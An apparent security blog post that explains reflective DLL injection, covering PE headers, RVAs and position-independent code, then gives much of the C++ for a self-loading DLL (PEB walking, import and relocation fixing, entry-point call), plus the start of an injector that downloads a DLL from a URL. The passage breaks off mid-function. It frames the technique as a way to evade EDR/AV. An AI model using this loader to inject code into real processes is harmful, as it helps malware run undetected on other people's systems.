Untitled

Reflective DLL

After some time spent on implementing a Reflective DLL and its beloved Loader/Injector I thought that it could have been a very great first topic for what it might become a long-ish series of blog posts about security, but mostly struggles and C(++).

First reason is that I felt like I was struggling a bit finding resources that would really take the topic as a whole and explain any single step, and the reasoning behind it. I might be really bad at googling, but I have also found some motivation in the fact that you really only understand a topic when you try to explain it (and rant about it, with lot of memes - let’s be honest, we understand really something only when we know what’s the right meme to use next to it).

So what’s going to be addressed here:

  • Technical reasoning behind Reflective DLL Injection
  • Intro to PE Structure
  • Intro to PE loading in memory
  • Pills of PIC (Position Independent Code)
  • StepByStep ReflectiveLoader function impl.
  • StepByStep Reflective DLL Injector impl.

I truly hope you will be enjoying.

Chee(e)rs

Reflective DLL injection

How does this work and why this technique is so widely used still nowadays? Well, if we want to make it short (and we do), the reason is that we do not want to drop stuff on disk, that makes it really easy for the EDR/AV to scan and analyse our nice artifacts, moreover we sometimes might want to move to another process and bring with us cool capabilities (not only PIC shellcode). Hence Reflective DLL injection. That comes with some challenges of course because DLL is a PE (Portable Executable), and despite we been wishing it was possible, we can’t just pasta it into memory and run the entry point. Which easily leads me to rant a bit about what’s a PE and how it actually works, we will get back to this part, eventually.

PE (Portable Executable)

A portable executable kinda have a self-explanatory name, it can be moved from one system to another and still being executed to carry out some tasks. I skip the part where I paste the list of all the extensions belonging to the PE category telling you that a DLL (Dynamic-Linked Library) is part of that list. But what does make a PE a PE? we can say that a PE is made of two macro group of information:

  • Headers
  • Sections

The headers are basically the ID card of the PE, few examples of data contained in there are the architecture for which the PE has been built, the version of PE, signatures etc.

On the other hand the sections contains the core of the PE, so the actually code that is compiled, variables, functions etc.

What makes the PE really portable is that all the information needed for the runtime are contained within the PE object.

Headers have static position (not sure static is the right word here), and that does not need to be adjusted when the PE is loaded in memory, they are placed at the beginning of the PE and their sequence and distance between each other is based of constant offset (same for any PE, and there is one Relative Address used within the headers, still it’s pointing to raw data). Furthermore, the PE compiled code does not actually need the headers to run, but those are needed so that the Windows loader will know where to place the code in order to be ran. We will see why this is important to us.

On the other hand content inside the Sections rely completely on RVAs generated by the compiler (Relative Virtual Address)

https://media3.giphy.com/media/jUwpNzg9IcyrK/giphy.gif?cid=7941fdc6sjfs9fwmtb1p9gfp8t9o31bq2bfrz1u8hrxi2no6&ep=v1_gifs_search&rid=giphy.gif&ct=g

When a process is launched, the operating system (OS) assigns a set of virtual addresses to the process, providing it with the memory it needs to carry out its operations. This set of addresses is referred to as the process’s virtual address space, and it is not assigned in advance. Since the PE does not know in advance what address is going to end up in memory, the compiler has to generate Relative Virtual Address (relatively counted from the ImageBase of the PE in memory) to refer to data within the PE. In order to really understand the concept I can suggest to read some blogs here and there, but what we want to really remember and what matters to us, is that since the PE is going to be executed only once loaded in the process virtual space, all the information contained in the sections rely on RVAs.

Let’s look at this also by another angle, when we read PE bytes from file, or just download the file from the internet, we are dealing with raw data. Raw data is basically the way the PE looks on disk, and within the PE headers we do have information about how those Raw bytes needs to be loaded in memory and where they should be placed in order to guarantee a proper PE execution. We can refer to headers even when still dealing with Raw data, they have same shape in memory as when on disk.

Most importantly, allocating memory within the virtual space of a process and writing the raw bytes does not mean we are loading the PE. The PE core wants to be in a specific shape within the virtual memory, and the process of placing the sections at the correct virtual address with the correct memory protections (and many other tasks), it’s equal to loading.

I really feel like I have to stress out on this part though

https://media2.giphy.com/media/5LU6ZcEGBbhVS/giphy.gif?cid=7941fdc61behcrwuwmzvnibn6x424srwli1od9uhnvkcd2xh&ep=v1_gifs_search&rid=giphy.gif&ct=g

because most of the times the word Loading might come through like reading the bytes of a PE in a byte array is enough for the PE to be “loaded in memory”. It is not, bytes there still looks like raw data and if you want to map them so that the PE is executed, you got to take a look at the headers, understand what the PE wants to run smoothly and eventually create its cozy environment in memory.

A very great tool to go through the PE structure is:

GitHub - hasherezade/pe-bear: Portable Executable reversing tool with a friendly GUI

Let’s pick an example and go through the Headers and Sections:

I mentioned before, there are two macro group of information: Sections and Headers

Untitled

We see on the left the structure of the PE, which starts with headers:

  • DOS Header
  • NT Header
  • File Header
  • Optional Header

Also on the left we can see the very beginning of the PE file (by clicking on the DOS header). Those lines are represented by 16 bytes each (HEX format) and it starts from 0. That 0 is a RVA, relative again to the location that it will get once loaded in memory (Virtual Address). The content of all those headers is not really topic for this blog post (which is already becoming too long) but here there are probably answers to all your questions: https://learn.microsoft.com/en-us/windows/win32/debug/pe-format

Before moving forward, as I said all those addresses are RVA, which means:

  • We read the PE from file → nice byte[] is now holding the PE raw bytes
  • We VirtualAlloc a new place for our PE to be executed → Its new address is returned by VirtualAlloc and for instance is 0x00000249FCF30000

Hence all those address we see in PE-bear are going to be:

PE-Bear RVAIn-memory
00x00000249FCF30000+0
100x00000249FCF30000+10
and so on

Just below the Headers we see the sections, those are the actually sections of compiled code:

Untitled

Each section has different purpose in the PE, e.g. holding global&static variables, function implementation, etc. Still that won’t be covered here but again this is actually a great resource to dive deeper into PE structure.

Couple of extra things that are worth to be mentioned though:

  • We can confirm there is difference between the way the PE looks when on disk, and when instead it’s loaded in memory

Untitled

  • Optional headers are not really optional and they hold quite lot of interesting information for the PE execution, among which we find the EntryPoint, the SizeofImage and the pointer to the Import/Export data structure
  • A PE might make use of functions defined in other libraries (DLL), even if the PE itself is a DLL. All the DLL needed for the correct operation of the PE are defined in the Import directory:
  • In the case the PE is actually a DLL, the Exports directory contains the functions the DLL exports/makes available to the processes that loads it

The list above represents a very little description of the PE structure and how it behaves when it has to be executed, still it should be enough to step into the real hot-topic of this blog. One last summary though 😎

So again, why all the above?

The reason I have been ranting about RVAs and Windows Loader is that if we want execute PEs in memory we have to act like the Windows loader. What makes this topic even more fun is that the Reflective DLL is going to be its own loader.

Bit of context: The DLL that we want to execute it’s going to end-up very lonely in a remote process memory space, moreover the DLL won’t be automatically loaded so also the environment won’t be that cosy after all (just raw data → not good enough if we want to run the PE).

Bit of problems: Of course we can build our independent loader and just make it work on a remote process, but that would entail lots of operations carried out from one process to another, and if we started all of this to be more OPSEC and stealthy that’s really the wrong path (and very painful to write, and also no-sense).

Bit of solutions: As I mentioned before, DLLs are kinda famous for exporting functions, a DLL can implement functions that are made available to the process that loads the DLL in-memory. Very bello, how does this help? Any functions that is exported by the DLL is implemented at a specific RVA (remember PE-bear?), so in theory we might be able to know where this function is in the PE even before it is loaded in memory. That function can be invoked to perform the loading operations 💡

True, and it is still necessary for the DLL to loaded in memory to be executed (global and static variables, imported functions…), but what if we manage to build a function that is both position independent and also carries out all the loading tasks?

https://media0.giphy.com/media/AJwnLEsQyT9oA/giphy.gif?cid=7941fdc6iz2peinbkx349wfjgr42vr0qb76hx0bozbx1i1dx&ep=v1_gifs_search&rid=giphy.gif&ct=g

That is our solution. Writing an exported function within the DLL that we want to load which is position independent and it is also able to carry out loading operations.

Let’s put all these nice concepts in a bullet list per favore:

  1. We inject the Reflective DLL into a remote process
  2. We find the RAW address of the ReflectiveFunction
  3. We create a remote thread that execute that function in the remote process
  4. The DLL loads itself into memory and execute the entry point 😎

Still bit confusing, I know:

By this time the concept of Reflective DLL injection should be more or less clear. But since I feel like I haven’t explained enough the concept of the position independent code, let’s spend few words on it. So why the PE is position-dependent and it needs the loader to be executed? As we saw before there are many RVAs the PE relies on, and those need to be adjusted basing on the position the PE gets assigned in memory. However it is possible to write a code that will be compiled in a nice sequence of bytes that will be able to run regardless the position they have in memory, that’s because for instance no external functions are used, strings are pushed on the stack only, etc.

Example of Position-Dependent code: you write a C++ function that uses Win32 MessageBoxA API to pop a “I do care about where I am before running”. The usage of MessageBoxA api loaded via user32.dll will break the code if ran before the DLL is loaded properly. MessageBoxA will still be in the import directory with a wrong address → boom.

Example of Position-Independent code: you write a C++ function that still uses MessageBoxA API but instead of including the library and invoke the function, it parses first the Export Directory of the user32.dll in memory and retrieve the MessageBoxA address function without relying on the Windows Loader. Eventually it will pop “I do not care where I am just let me run”

Finally some code!

Finally this blog post gets hands-on. We are going to develop two different modules here:

  • Reflective DLL: DLL that exports a Position-Independent function that carries out all the loading operations before invoking the Dll entry point
  • Reflective DLL Injector: DLL loads itself but it needs to be injected in some process before that, also the ReflectiveFunction must be invoked. This code will help with this.

little disclaimer: This code does not implement any technique to bypass the actual state of security protections nowadays. It is just a blog with learning/teaching purposes.

Reflective DLL

Ok so very first thing, the ReflectiveFunction will have to be exported:

#define EXTERN_DLL_EXPORT extern "C" __declspec(dllexport)
EXTERN_DLL_EXPORT bool ReflectiveFunction() {
//reflective function implementation, all the code we will be going through next
//ends up here
//     |
//     |
//     |
//     V
}

I will skip the part where I declare (most of) the variables: code will be available in my Github and here we are going to focus only on the logic of the loader. Still there are some variables that demands some attention. Here it is important to keep in mind that everything within the “ReflectiveFunction” must be Position-Independent. That means that all our variables must be stack variables. Stack variables do not end-up in the compiled code section (where they would need to be relocated), but they are always addressed using the relative offset of stack pointer.

//stack strings for PIC
WCHAR kernel32[] = { L'K', L'e', L'r', L'n', L'e', L'l', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
WCHAR ntdll[] = { L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', L'\0' };
WCHAR user32[] = { L'U', L's', L'e', L'r', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
CHAR virtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', '\0' };
CHAR virtualProtect[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', '\0' };
CHAR rtladdFunctionTable[] = { 'R', 't', 'l', 'A', 'd', 'd', 'F', 'u', 'n', 'c', 't', 'i', 'o', 'n', 'T', 'a', 'b', 'l', 'e', '\0' };
CHAR ntFlushInstructionCache[] = { 'N', 't', 'F', 'l', 'u', 's', 'h', 'I', 'n', 's', 't', 'r', 'u', 'c', 't', 'i', 'o', 'n', 'C', 'a', 'c', 'h', 'e', '\0' };
CHAR loadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', '\0' };

Declaring our strings like above will make the compiler push those single chars onto the stack at runtime. So, the difference lies in the initialization style: explicitly defining individual characters vs. using a string literal. The former results in a stack-allocated array, while the latter results in an array allocated in the initialized data section of the executable.

Anyway, during the infamous loading process we will have to work with memory, memory protections and also load other libraries. This sounds like Win32 API, which as I mentioned above we can’t use in the context of PIC, but we can still implement our version of GetModuleHandle and GetProcAddress to put our hands of the Win32 API function addresses.

In short, with GetModuleHandle we can get an handle on a module (DLL), with GetProcAddress we can retrieve the function address of a function within that module. How we implement those functions?

HMODULE GMHR(IN WCHAR szModuleName[]) {
    //custom structure for PEB
    //access to PEB via GSqword (64bit only)
    //https://learn.microsoft.com/en-us/cpp/intrinsics/readgsbyte-readgsdword-readgsqword-readgsword?view=msvc-170
    //https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
    PPEBC         pPeb = (PEBC*)(__readgsqword(0x60));
    PPEBC_LDR_DATA      pLdr = (PPEBC_LDR_DATA)(pPeb->Ldr);
    PLDR_DATA_TABLE_ENTRYC  pDte = (PLDR_DATA_TABLE_ENTRYC)(pLdr->InMemoryOrderModuleList.Flink);
    while (pDte) {
      
        if (pDte->FullDllName.Length != NULL) {
            //custom implementation of tolower() function
            ToLowerCaseWIDE(pDte->FullDllName.Buffer);
            ToLowerCaseWIDE(szModuleName);
            //if this is the DLL we want 
            if (ComprareStringWIDE(pDte->FullDllName.Buffer, szModuleName)) {
                return (HMODULE)(pDte->InInitializationOrderLinks.Flink);
            }
        }
        else {
            //reached the end byeee
            break;
        }
    pDte = *(PLDR_DATA_TABLE_ENTRYC*)(pDte);
    }
    return NULL;
}

If the implementation above works just fine, we will have an handle to the module we were looking for. As you can see I am using “custom” implementation of strcmp etc. That’s again because that code must be position independent 😊 and the only thing we can deal with is code that we write that itself deals only with stack variables.

Now that we have the handle to the MODULE we can use that to retrieve the function address. But what’s exactly the handle to a module? It is a pointer to the beginning of the module in memory, hence we can just use that as starting point to parse the PE headers and find the RVA of the function we want:

FARPROC GPAR(IN HMODULE hModule, IN CHAR lpApiName[]) {

    //access to the first headers of the module
    PBYTE pBase = (PBYTE)hModule;
    PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);
    //access to optional header and get access to the export directory
    IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader;
    PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    //access to the array of functions 
    PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);
    PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);
    PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);

    //stack variables for forwarding
    WCHAR kernel32[] = { L'K', L'e', L'r', L'n', L'e', L'l', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
    CHAR loadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', '\0' };
    fnLoadLibraryA LLA = NULL;
    PBYTE functionAddress = NULL;
    CHAR forwarder[260] = { 0 };
    CHAR dll[260] = { 0 };
    CHAR function[260] = { 0 };

    // looping through all the exported functions
    for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) {
        // getting the name of the function
        CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);
        // searching for the function specified
        if (ComprareStringASCII(lpApiName, pFunctionName)) {
            functionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);
            if (functionAddress >= (PBYTE)pImgExportDir && functionAddress < (PBYTE)(pImgExportDir + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)) {
                //some of the functions address might be forwarded to other DLLs
                ParseForwarder((CHAR*)functionAddress, dll, function);
                if ((LLA = (fnLoadLibraryA)GPAR(GMHR(kernel32), loadLibraryA)) == NULL)
                    return NULL;
                if (function[0] == '#') {
                    //sometimes modules refer to functions via ordinal
                    //instead of the name
                    return GPARO(LLA(dll), custom_stoi(function));
                }
                else {
                    return GPAR(LLA(dll), function);
                }
            }
            else {
                return (FARPROC)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);
            }
        }
    }
    return NULL;
}

Beautiful, if everything went well here we have got our hands on the function address we want. Important to mention that sometimes modules refer to function in their export directory by means of ordinal (int) and not via Names (let’s say this is always the case and sometimes the Name is not available). We want to be ready for that:

FARPROC GPARO(IN HMODULE hModule, IN int ordinal) {
    PBYTE pBase = (PBYTE)hModule;
    PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);

    IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader;
    PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    //getting the base = first ordinal value in the export table (DWORD 4 bytes)
    int base = (int)pImgExportDir->Base;
    int NumberOfFunctions = (int)pImgExportDir->NumberOfFunctions;

    //variables for forwarding
    WCHAR kernel32[] = { L'K', L'e', L'r', L'n', L'e', L'l', L'3', L'2', L'.', L'd', L'l', L'l', L'\0' };
    CHAR loadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', '\0' };
    fnLoadLibraryA LLA = NULL;
    PBYTE functionAddress = NULL;
    CHAR forwarder[260] = { 0 };
    CHAR dll[260] = { 0 };
    CHAR function[260] = { 0 };

    //check if we are dealing with a valid ordinal for that given module
    if (ordinal < base || ordinal >= base + NumberOfFunctions) {

        return NULL;
    }

    PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);
    PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);
    
    functionAddress = (PBYTE)(pBase + FunctionAddressArray[ordinal]);
    if (functionAddress >= (PBYTE)pImgExportDir && functionAddress < (PBYTE)(pImgExportDir + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)) {
    
        //still we need to check if the function is forwarded
        ParseForwarder((CHAR*)functionAddress, dll, function);
        if ((LLA = (fnLoadLibraryA)GPAR(GMHR(kernel32), loadLibraryA)) == NULL)
            return NULL;
        if (function[0] == '#') {
            return GPARO(LLA(dll), custom_stoi(function));
        }
        else {
            return GPAR(LLA(dll), function);
        }
    }
    return (FARPROC)(pBase + FunctionAddressArray[ordinal]);
}

Cool, by this point we should have capabilities to handle:

  • Win32 APIs
  • Stack variables
  • Custom implementation of other library functions (please refer to the full code for this)

That’s pretty much it when it comes to implement our reflective code.

(From now on the code we will be dealing with is placed inside the “ReflectiveFunction”).

First we gather the pointer to the functions we will need:

//all the variables passed to GPAR or GMHR are stack string declared as char[] as showed
if ((VA = (fnVirtualAlloc)GPAR(GMHR(kernel32), virtualAlloc)) == NULL)
        return FALSE;
if ((LLA = (fnLoadLibraryA)GPAR(GMHR(kernel32), loadLibraryA)) == NULL)
        return FALSE;
if ((VP = (fnVirtualProtect)GPAR(GMHR(kernel32), virtualProtect)) == NULL)
        return FALSE;
if ((RAFT = (fnRtlAddFunctionTable)GPAR(GMHR(kernel32), rtladdFunctionTable)) == NULL)
        return FALSE;
if ((FIC = (fnNtFlushInstructionCache)GPAR(GMHR(ntdll), ntFlushInstructionCache)) == NULL)
        return FALSE;

Now, in order to load itself in memory, the DLL has to look for its own first bytes (because as the good Loader that we are, we need to read the headers), and in order to do so, it will walk backwards from its position till some conditions are met. The condition to meet here is to look for a match with NT and DOS signature bytes (sequence of bytes contained in the PE headers which categorize the PE), which might work but also generate false positives. My solution for this blog post and most likely future code is to write an header before the DLL into the memory allocated in the remote process (kinda like egghunter if you familiar with the concept). So matching the header before actually matching the NT and DOS signature. The ReflectiveFunction will look backwards for the header bytes, and only when those are matched then it will try to match NT and DOS signature.

while (TRUE)
    {
        pDllHeader = (PDLL_HEADER)dllBaseAddress;   
        //remember windows little-endian 
        if (pDllHeader->header == 0x44434241) {
            //header matched, we check if next bytes are DOS signature
            pImgDosHdr = (PIMAGE_DOS_HEADER)(dllBaseAddress + (5*sizeof(CHAR)));
            if (pImgDosHdr->e_magic == IMAGE_DOS_SIGNATURE)
            {                
              //DOS matched, we check if next bytes are NT signature
               pImgNtHdrs = (PIMAGE_NT_HEADERS)(dllBaseAddress + pImgDosHdr->e_lfanew + (5 * sizeof(CHAR)));
               if (pImgNtHdrs->Signature == IMAGE_NT_SIGNATURE) {
                    break;
                }
            }
        }
        //walking backwards removing one bytes at time from the
        //reflective function address
        dllBaseAddress--;
    }
    if (!dllBaseAddress)
        return FALSE;
    //fixing the baseAddress including the 5 bytes of header
    //so that it points to the beginning of the RAW DLL
    dllBaseAddress = dllBaseAddress + (5 * sizeof(CHAR));

In the memory of the remote process it will look somehow like this:

Now that the DLL found itself in memory we can start with the actual process of loading:

  • Mapping sections in the Virtual Memory
  • Fixing the Import Address Table (IAT)
  • Adjust the Base Relocation table
  • Assign correct memory protection to any Virtual Sections
  • Flushing CPU instructions cache
  • Running the DllMain entry point 💣

As I mentioned before the bytes that we wrote in the remote process are RAW bytes. In order for the DLL to be executed in memory, its bytes needs to be mapped at specific virtual addresses:

//retrieving pointer to header we need
PIMAGE_OPTIONAL_HEADER pImgOptHdr = (PIMAGE_OPTIONAL_HEADER)((ULONG_PTR)pImgNtHdrs + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER));
ImgFileHdr = pImgNtHdrs->FileHeader;
/*--------------COPY SECTIONS IN MEMORY---------------------------*/
    
  //allocating memory for the PE in memory using the VA function pointer retrieved
  //using the custom implementation of GetProcAddress/GetModuleHandle
  if ((pebase = (PBYTE)VA(NULL, pImgOptHdr->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) == NULL)
        return FALSE;
    
  //allocate memory for an array of SECTION HEADERS
  peSections = (PIMAGE_SECTION_HEADER*)custom_malloc((sizeof(PIMAGE_SECTION_HEADER) * ImgFileHdr.NumberOfSections), VA);
  if (peSections == NULL)
        return FALSE;  
  //save pointers to sections inside the array of section headers
  for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {    
       peSections[i] = (PIMAGE_SECTION_HEADER)(((PBYTE)pImgNtHdrs) + 4 + 20 + ImgFileHdr.SizeOfOptionalHeader + (i * IMAGE_SIZEOF_SECTION_HEADER));
  }
  //copying the RAW data in the desired VirtualAddress
  for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {
       custom_memcpy(
           (PVOID)(pebase + peSections[i]->VirtualAddress),// Destination
           (PVOID)(dllBaseAddress + peSections[i]->PointerToRawData),// Source
           peSections[i]->SizeOfRawData// Size
       );
   }

Once the sections are in-memory at the correct Virtual Address, all the RVA start to have some meaning. Hence here we can start fixing the Import Directory = go through the list of the DLL that our Reflective DLL needs to operate at full capabilities, import them and adjust the RVA of every function based on the location we got in memory. Basically transforming all the RVAs in VAs (VA = ImageBase + RVA).

/*--------------FIX IAT TABLE--------------*/
   
 for (size_t i = 0; i < pImgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size; i += sizeof(IMAGE_IMPORT_DESCRIPTOR)) {
        //retrieving pointer to image import descriptor
        pImgImpDesc = (PIMAGE_IMPORT_DESCRIPTOR)(pebase + pImgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + i);
        
        //import DLL using LoadLibraryA retrieved via custom impl.
        //of GetModuleHandle/GetProcAddress
        dll = LLA((LPSTR)(pebase + pImgImpDesc->Name));
        if (dll == NULL) {
            return FALSE;
        }
        //gathering reference to ILT and IAT
        pOriginalFirstThunk = (PIMAGE_THUNK_DATA64)(pebase + pImgImpDesc->OriginalFirstThunk);
        pFirstThunk = (PIMAGE_THUNK_DATA64)(pebase + pImgImpDesc->FirstThunk);
        //if reference are not null
        while (pOriginalFirstThunk->u1.Function != NULL && pFirstThunk->u1.Function != NULL) {
            //check if the function is referred via ordinal
            if (pOriginalFirstThunk->u1.Ordinal & 0x8000000000000000) {
                //retrieve the ordinal bytes
                //by keeping only the lower 16 bits
                ordinal = pOriginalFirstThunk->u1.Ordinal & 0xFFFF;
                //retrieve the function address
                funcAddress = GPARO(dll, (int)ordinal);
                if (funcAddress != nullptr)
                    //adjusting the IAT (address returned is summed to the DllBaseAddress)
                    pFirstThunk->u1.Function = (ULONGLONG)funcAddress;
            }
            else {
                //case the function can be found via its name
                pImgImportByName = (PIMAGE_IMPORT_BY_NAME)(pebase + pOriginalFirstThunk->u1.AddressOfData);
                funcAddress = GPAR(dll, pImgImportByName->Name);
                if (funcAddress != nullptr)
                    pFirstThunk->u1.Function = (ULONGLONG)funcAddress;
            }
            //moving to the next 
            pOriginalFirstThunk++;
            pFirstThunk++;
        }
    }

Ok at this point also the IAT is fixed, that means that if the DLL happens to be executed in memory within that process, it will know where to find the functions that it needs. Time to apply base relocations now. I really suggest to get an overview of PE Base Relocations here but what we can briefly say about relocations is that when a program is compiled, the compiler assumes a specific base address for the executable. Various addresses are then computed and embedded within the executable based on this base address. However, it’s not likely that the executable will load at this exact base address. Instead, it’s likely to load at a different address, making all these embedded addresses invalid. To address this loading-issue, a list containing all these embedded, fixed values that require adjustment is stored in a specialized table known as the Relocation Table within the PE file. This table resides within a Data Directory within the .reloc section. The process of relocation, carried out by the loader (and of the ReflectiveLoader function 😊), is responsible for rectifying these values to reflect the correct addresses based on the actual loading address of the executable. More detailed information about relocation can be found here.

/*--------------APPLY BASE RELOCATIONS--------------*/
    //calculating the delta which is the difference between
    //the imagebase address hardcoded by the compiler and the 
    //actual base address
    delta = (ULONG_PTR)pebase - pImgOptHdr->ImageBase;
    //pointer to image relocation table
    pImgRelocation = (PIMAGE_BASE_RELOCATION)(pebase + pImgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);

    while (pImgRelocation->VirtualAddress) {
        pRelocEntry = (PBASE_RELOCATION_ENTRY)(pImgRelocation + 1);
        //removing headers size and dividing by entry size
        //header is 8 bytes and the size of each entry is 2
        entriesCount = (int)((pImgRelocation->SizeOfBlock - 8) / 2);
        //loop through relocation entries 
        for (int i = 0; i < entriesCount; i++) {
            switch (pRelocEntry->Type) {
            case IMAGE_REL_BASED_DIR64://if it's equal to A meaning = 10
            {//The base relocation applies the difference to the 64-bit field at offset.
                //so i need to add the delta to the 64-bit value at that offset
                ULONGLONG* toAdjust = (ULONGLONG*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += (ULONGLONG)delta;
                break;
            }
            case IMAGE_REL_BASED_HIGHLOW:
                //The base relocation applies all 32 bits of the difference to the 32-bit field at offset.
            {
                DWORD* toAdjust = (DWORD*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += (DWORD)delta;
            }
            break;
            case IMAGE_REL_BASED_HIGH:
                //The base relocation adds the high 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the high value of a 32-bit word.
            {
                WORD* toAdjust = (WORD*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += HIWORD(delta);
            }
            break;
            case IMAGE_REL_BASED_LOW:
                //The base relocation adds the low 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the low half of a 32-bit word. 
            {
                WORD* toAdjust = (WORD*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += LOWORD(delta);
            }
            break;
            case IMAGE_REL_BASED_ABSOLUTE:
                //The base relocation is skipped. This type can be used to pad a block
                break;
            }
            pRelocEntry++;
        }
        pImgRelocation = (PIMAGE_BASE_RELOCATION)(reinterpret_cast<DWORD_PTR>(pImgRelocation) + pImgRelocation->SizeOfBlock);
    }

Let’s take a look at our TO-DO list and see what’s missing:

  • Mapping sections in the Virtual Memory
  • Fixing the Import Address Table (IAT)
  • Adjust the Base Relocation table
  • Assign correct memory protection to any Virtual Sections
  • Flushing CPU instructions cache
  • Running the DllMain entry point

As we saw before in PE-bear all the raw data must be mapped into the virtual sections, and any sections has its own memory protections. We want to be sure we assign the right characteristics to any section:

/*-------------ADJUST MEMORY PROTECTIONS BASING ON SECTIONS HEADERS*/

 for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) {//write
         dwProtection = PAGE_WRITECOPY;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_READ) {//read
         dwProtection = PAGE_READONLY;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE) {//exec
         dwProtection = PAGE_EXECUTE;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_READ && peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) { //readwrite
         dwProtection = PAGE_READWRITE;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE && peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) { //executewrite
         dwProtection = PAGE_EXECUTE_WRITECOPY;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE && peSections[i]->Characteristics & IMAGE_SCN_MEM_READ) { //executeread

         dwProtection = PAGE_EXECUTE_READ;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE && peSections[i]->Characteristics & IMAGE_SCN_MEM_READ && peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) { //executereadwrite

         dwProtection = PAGE_EXECUTE_READWRITE;
     }
      //virtual protect function retrieved via GPAR and GMHR
     if (!VP((PVOID)(pebase + peSections[i]->VirtualAddress), peSections[i]->SizeOfRawData, dwProtection, &dwOldProtection)) {
         return FALSE;
     }
 }

Finally, in order to complete the loading process:

/*--------------FLUSHING INSTRUCTION CACHE ALLA FEWER*/
 //as mentioned here https://github.com/stephenfewer/ReflectiveDLLInjection/blob/master/dll/src/ReflectiveLoader.c
 //We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
 FIC((HANDLE)-1, NULL, 0x00);
 
 /*--------------EXECUTE ENTRY POINT--------------*/
 pDllMain = (fnDllMain)(pebase + pImgNtHdrs->OptionalHeader.AddressOfEntryPoint);
 return pDllMain((HMODULE)pebase, DLL_PROCESS_ATTACH, NULL);

Reflective DLL Injector

In the journey of “Inject a Reflective DLL” we still miss the injection part. Our DLL is ready to load itself and shine, However it still needs to be placed into a remote process and the ReflectiveFunction has to be executed. Step by step what does our injector has to do?

  • Download/Read our DLL bytes
  • Find the RAW address of the ReflectiveFunction
  • Allocate Memory in the remote process
  • Write the RAW bytes in the remote memory location
  • Create a remote thread that would run the “ReflectiveLoader” function

First things, first. Let’s download the DLL (skipping the argument parsing part, you can find the full code here):

//function to download the payload via HTTP
vector<char> downloadFromURL(IN LPCSTR url) {
  IStream* stream;
  vector<char> buffer;
  if (URLOpenBlockingStreamA(0, url, &stream, 0, 0))
  {
    cout << "[-] Error occured while downloading the file";

    return buffer;
  }
  //we work with C++ so let's enjoy the vector class
  buffer.resize(100);
  unsigned long bytesRead;
  int totalbytes = 0;
  while (true)
  {
